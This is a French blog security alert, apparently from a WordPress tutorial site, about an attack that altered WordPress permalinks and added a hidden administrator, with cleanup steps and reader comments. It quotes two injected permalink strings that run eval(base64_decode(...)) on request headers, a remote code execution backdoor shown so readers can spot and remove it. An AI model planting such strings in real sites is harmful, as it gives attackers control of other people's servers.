De nombreux sites sont touchés par une récente attaque SQL où des codes sont injectés sur votre site. Cette injection MySQL affecte vos permaliens en les rendant inefficaces. Par conséquent, les URL de vos articles de blog ne fonctionneront pas. De nombreux blogs WordPress ont été ciblés lors de cette attaque. Merci à Andy Soward de nous avoir signalé cela.
L'un des codes suivants a été ajouté à votre structure de permaliens en raison de cette attaque :
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Ces guillemets ont été ajoutés à tous les permaliens de votre site et ne peuvent être modifiés que s'ils sont supprimés manuellement.
Pour résoudre ce problème, allez à :
Paramètres > Permaliens et supprimez le code ci-dessus et remplacez votre code par défaut.
La prochaine chose à faire est d'aller dans Utilisateurs. Vous verrez qu'il y a plus d'un administrateur. Vous ne verrez pas leur nom listé, mais vous verrez le nombre augmenter. Vous devez donc examiner tous les utilisateurs et trouver le dernier qui s'est enregistré. Passez votre souris sur cet utilisateur et obtenez le lien. Modifiez le code userid= en ajoutant 1 à ce nombre. Donc, si le dernier utilisateur que vous pouvez voir était l'utilisateur n° 2, ajoutez 1 et faites-en 3. Vous devriez trouver que l'administrateur caché a un code étrange comme prénom. Supprimez le code et faites-en un abonné. Revenez ensuite et supprimez-le.
Cela devrait résoudre le problème. Vous pouvez également le supprimer simplement en allant dans votre PHPMyAdmin. Parce que vous verrez l'utilisateur là-bas.
Nous voulions simplement diffuser cette nouvelle dès que possible, afin que nos utilisateurs puissent être informés. Veuillez vous assurer que votre blog n'est pas infecté. Nous espérons que WordPress publiera bientôt une mise à jour.
De plus, si vous n'avez pas mis en œuvre certaines de ces mesures pour sécuriser votre zone d'administration WordPress.


ahmed_alaaedin
La base de données de mon site web a été injectée il y a quelques jours, ajoutant des caractères et des mots étranges après chaque URL de publication ou de page. Je n'ai rien trouvé d'étrange dans les paramètres : permaliens ou dans le menu des utilisateurs. Que faire pour résoudre ce problème, s'il vous plaît ? Mon hébergeur a une sauvegarde de la base de données infectée également !
un utilisateur wordpress
j'ai été touché par ça deux fois.
la première fois, c'était une injection SQL du plugin wassup, cette fois je ne suis pas sûr. mon fournisseur d'hébergement m'a bloqué.
une fois qu'ils auront restauré mon compte, je supprimerai WordPress... J'en ai assez !
Personnel éditorial
Peut-être que ce n'est pas la faute de WordPress, peut-être que la sécurité de votre hébergement n'est tout simplement pas aussi bonne...
Admin
Joey
Qu'avez-vous découvert à ce sujet ? J'ai été touché par le même problème. Tous mes sites WP sur mon compte souffrent du même problème.
lerrkin
Salut.
URL intéressante https://014.leahstevensyj.workers.dev/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ liée d'ici affiche une page blanche.
Code contains this comment: ‘‘.
That’s WP Super Cache’s bug http://wordpress.org/support/topic/315446, and it seems present here… So update WP Super Cache, please. I hope read that tips soon
Personnel éditorial
Nous apprécions vraiment ce commentaire, le problème ne venait pas de WP Super Cache, nous pensons que c'était le plugin appelé WP External Link. Nous avons désinstallé et réinstallé WP-Super Cache deux fois, puis nous avons comparé le serveur de développement où tout fonctionnait bien. La différence était ce plugin. Lorsque nous avons supprimé ce plugin, cela a fonctionné. Vous pouvez maintenant lire cet article.
Admin
lerrkin
Maybe that was WP External Link and Super Cache conflict…
Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
I see my pasted WP-Super-Cache html comment above works as html comment and is invisible
So last Super Cache ver. promises to do not html validity check.
Oh, je lis !
Merci beaucoup !
Roseli A. Bakar
Thanks for highlighting this